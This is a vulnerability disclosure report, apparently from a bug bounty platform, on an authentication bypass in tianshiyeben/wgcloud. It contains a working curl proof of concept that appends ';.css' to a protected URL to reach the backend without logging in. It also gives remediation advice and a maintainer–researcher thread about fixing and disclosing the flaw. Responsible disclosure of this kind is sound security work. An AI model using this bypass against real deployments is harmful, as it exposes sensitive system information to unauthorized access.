Auth bypass via unproper use of getRequestURL() in tianshiyeben/wgcloud

Valid

Reported on

Mar 29th 2022

Description

The wgcloud uses getRequestURL() improperly, an attacker could craft an URL that bypasses the auth of wgcloud

Normally, when browsering http://[ip]:9999/wgcloud/dash/main with no auth, you will be redirected to /wgcloud/login/toLogin, but this vuln could bypass this.

Proof of Concept

curl  'http://[ip]:9999/wgcloud/dash/main;.css' 

HTTP/1.1 200 
Set-Cookie: JSESSIONID=00659E0197260C8DF3988AC21AA987CC; Path=/wgcloud; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Transfer-Encoding: chunked
Date: Tue, 29 Mar 2022 14:36:24 GMT

while no auth is needed to get into the backend...

Impact

This vulnerability is capable of abusing the backend functions, while no auth is required. An attacker could retrieve sensitive infomation of the system via this vuln

Occurrences

indexof is not recommended, should be more accurate. Use @WebFilter(urlPatterns) instead, or config resource/static in application.properties

Don't use getRequestURL(), Use getServletPath() instead.

indexof is not recommended, should be more accurate. Use @WebFilter(urlPatterns) instead, or config resource/static in application.properties

We are processing your report and will contact the tianshiyeben/wgcloud team within 24 hours. a year ago
hi-unc1e modified the report
a year ago
hi-unc1e modified the report
a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
We have contacted a member of the tianshiyeben/wgcloud team and are waiting to hear back a year ago
tianshiyeben/wgcloud maintainer has acknowledged this report a year ago
tianshiyeben
a year ago

Maintainer

Thank you very much for your suggestions. I already know how to fix it and have started to make some updates

hi-unc1e
a year ago

Researcher

OK, can you update the status of this issue? So that a vulnerability serial-number could be assigned, and we both can get some bonus.

tianshiyeben
a year ago

Maintainer

OK, give me a little more time. I haven't finished it yet. I'll update this status at that time

tianshiyeben
a year ago

Maintainer

Hello, excuse me, I now change the status to valid. Will this bug not be disclosed

hi-unc1e
a year ago

Researcher

It seems that @tianshiyeben don't want to disclose this vuln, I am not quite sure about it, let's ask admin about it Hi ,@admin what should we do if we want to keep this vuln private.

tianshiyeben
a year ago

Maintainer

ok,I still have some work to finish now. I want to wait some time

hi-unc1e
a year ago

Researcher

Okay, understood

tianshiyeben
a year ago

Maintainer

thank you

Jamie Slome
a year ago

Admin

You can go ahead and mark the report as valid. This will NOT make the report public. Only once you have marked it as fixed, will the report go public 👍

In short, if you tell us a report is fixed, it will be made public.

tianshiyeben validated this vulnerability a year ago

ok

hi-unc1e has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the tianshiyeben/wgcloud team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the tianshiyeben/wgcloud team. We will try again in 10 days. a year ago
tianshiyeben
a year ago

Maintainer

Thank you for your feedback and suggestions. I have fixed this bug and released it

tianshiyeben
a year ago

Maintainer

Thank you for your feedback and suggestions. I have fixed this bug and released it

Thank you again

tianshiyeben
a year ago

Maintainer

I found that I can't mark it as repaired. There is no response after clicking the button. Can the administrator help me @admin

tianshiyeben marked this as fixed in 2.3.7 or 3.3.8 with commit 91f7cb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
AuthRestFilter.java#L49 has been validated
AuthRestFilter.java#L45-L46 has been validated
AuthRestFilter.java#L56 has been validated
tianshiyeben
a year ago

Maintainer

ok I've marked it as fixed @admin

to join this conversation